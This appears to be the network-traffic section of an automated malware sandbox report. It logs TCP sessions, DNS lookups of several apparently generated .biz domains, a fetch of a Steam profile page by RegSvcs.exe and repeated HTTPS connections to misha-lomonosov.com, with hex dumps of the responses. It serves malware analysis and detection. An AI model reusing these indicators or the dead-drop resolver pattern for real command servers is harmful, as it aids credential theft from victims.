                                                                                              Jan 12, 2025 09:13:03.222681999 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.645843029 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.646051884 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.646100998 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.646501064 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.646516085 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.646529913 CET49731443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.646533012 CET44349731172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.652939081 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.653012037 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:03.653105021 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.653340101 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:03.653373003 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.150154114 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.150232077 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.151474953 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.151508093 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.152570963 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.153826952 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.153883934 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.153975010 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.600768089 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.600883007 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.600943089 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.600970984 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.600999117 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601047993 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.601089954 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601308107 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601397038 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601443052 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.601473093 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601613998 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601659060 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.601675034 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.601716042 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.601727962 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.605582952 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.606087923 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.606106997 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.656289101 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.692656994 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.692814112 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.692862034 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.692882061 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.693063974 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.693124056 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.694058895 CET49732443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.694108963 CET44349732172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.772650003 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.772737980 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:04.773010015 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.773235083 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:04.773272038 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:05.241906881 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:05.241985083 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:05.243057966 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:05.243083000 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:05.243747950 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:05.244698048 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:05.244820118 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:05.244863987 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:05.244959116 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:05.244971991 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.000776052 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.000978947 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.001065969 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.016761065 CET49733443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.016801119 CET44349733172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.185782909 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.185856104 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.185913086 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.186516047 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.186531067 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.683816910 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.684051037 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.705091000 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.705152035 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.706017971 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:06.707240105 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.707357883 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:06.707437038 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.273308039 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.273523092 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.273727894 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.273729086 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.334964037 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.335052967 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.335196018 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.335484982 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.335517883 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.578280926 CET49734443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.578335047 CET44349734172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.826809883 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.827143908 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.828294039 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.828318119 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.829303980 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.830318928 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.830451965 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.830547094 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.830626965 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.830626965 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:07.830645084 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:07.871350050 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:08.453134060 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:08.453360081 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:08.453476906 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:08.564392090 CET49735443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:08.564431906 CET44349735172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:09.111887932 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.111926079 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:09.111984968 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.112462997 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.112478018 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:09.588372946 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:09.588548899 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.589498997 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.589510918 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:09.590543032 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:09.591573000 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.591639996 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:09.591645956 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.015868902 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.016185999 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.016256094 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.016364098 CET49736443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.016386986 CET44349736172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.302479029 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.302587986 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.302803040 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.303004980 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.303025007 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.764559031 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.764736891 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.765813112 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.765836000 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.766186953 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.767282009 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.767926931 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.767975092 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.768095970 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.768143892 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.768270016 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.768306971 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.768450022 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.768497944 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.768649101 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.768697023 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.768882990 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.768925905 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.768942118 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.768970013 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.769129992 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.769166946 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.769207001 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.769316912 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.769361973 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.778297901 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.778511047 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.778563976 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.778577089 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.778613091 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:10.778693914 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:10.783950090 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.285746098 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.285984993 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.286052942 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.286127090 CET49737443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.286170006 CET44349737172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.293746948 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.293776989 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.293829918 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.294395924 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.294406891 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.854787111 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.854856014 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.863399029 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.863410950 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.864247084 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:13.865879059 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.865891933 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:13.866105080 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:14.615919113 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:14.616126060 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:14.617156029 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:14.620551109 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:14.620563984 CET44349738172.67.160.193192.168.2.4
                                                                                              Jan 12, 2025 09:13:14.620572090 CET49738443192.168.2.4172.67.160.193
                                                                                              Jan 12, 2025 09:13:14.620577097 CET44349738172.67.160.193192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 12, 2025 09:13:01.242893934 CET5198353192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.252032995 CET53519831.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.255490065 CET5411653192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.264302969 CET53541161.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.271042109 CET5994353192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.280770063 CET53599431.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.282561064 CET5962853192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.291778088 CET53596281.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.293471098 CET5128153192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.302793026 CET53512811.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.304408073 CET6357553192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.313317060 CET53635751.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.315104961 CET6129553192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.325337887 CET53612951.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.326572895 CET5707853192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.335338116 CET53570781.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:01.336393118 CET6081553192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:01.343213081 CET53608151.1.1.1192.168.2.4
                                                                                              Jan 12, 2025 09:13:02.675997019 CET5540453192.168.2.41.1.1.1
                                                                                              Jan 12, 2025 09:13:02.686858892 CET53554041.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 12, 2025 09:13:01.242893934 CET192.168.2.41.1.1.10xa37eStandard query (0)grandiouseziu.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.255490065 CET192.168.2.41.1.1.10xa00aStandard query (0)fraggielek.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.271042109 CET192.168.2.41.1.1.10x53fStandard query (0)littlenotii.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.282561064 CET192.168.2.41.1.1.10x841dStandard query (0)marketlumpe.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.293471098 CET192.168.2.41.1.1.10x30aaStandard query (0)nuttyshopr.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.304408073 CET192.168.2.41.1.1.10x79ddStandard query (0)punishzement.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.315104961 CET192.168.2.41.1.1.10x7554Standard query (0)spookycappy.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.326572895 CET192.168.2.41.1.1.10x7feeStandard query (0)truculengisau.bizA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.336393118 CET192.168.2.41.1.1.10xaeeStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:02.675997019 CET192.168.2.41.1.1.10xe184Standard query (0)misha-lomonosov.comA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 12, 2025 09:13:01.252032995 CET1.1.1.1192.168.2.40xa37eName error (3)grandiouseziu.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.264302969 CET1.1.1.1192.168.2.40xa00aName error (3)fraggielek.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.280770063 CET1.1.1.1192.168.2.40x53fName error (3)littlenotii.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.291778088 CET1.1.1.1192.168.2.40x841dName error (3)marketlumpe.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.302793026 CET1.1.1.1192.168.2.40x30aaName error (3)nuttyshopr.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.313317060 CET1.1.1.1192.168.2.40x79ddName error (3)punishzement.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.325337887 CET1.1.1.1192.168.2.40x7554Name error (3)spookycappy.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.335338116 CET1.1.1.1192.168.2.40x7feeName error (3)truculengisau.biznonenoneA (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:01.343213081 CET1.1.1.1192.168.2.40xaeeNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:02.686858892 CET1.1.1.1192.168.2.40xe184No error (0)misha-lomonosov.com172.67.160.193A (IP address)IN (0x0001)false
                                                                                              Jan 12, 2025 09:13:02.686858892 CET1.1.1.1192.168.2.40xe184No error (0)misha-lomonosov.com104.21.14.233A (IP address)IN (0x0001)false
                                                                                              • steamcommunity.com
                                                                                              • misha-lomonosov.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730104.102.49.2544437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:02 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              2025-01-12 08:13:02 UTC1905INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Sun, 12 Jan 2025 08:13:02 GMT
                                                                                              Content-Length: 35141
                                                                                              Connection: close
                                                                                              Set-Cookie: sessionid=deedee908afd400aae4f9a45; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                              2025-01-12 08:13:02 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                              2025-01-12 08:13:02 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                              Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                              2025-01-12 08:13:02 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                              Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
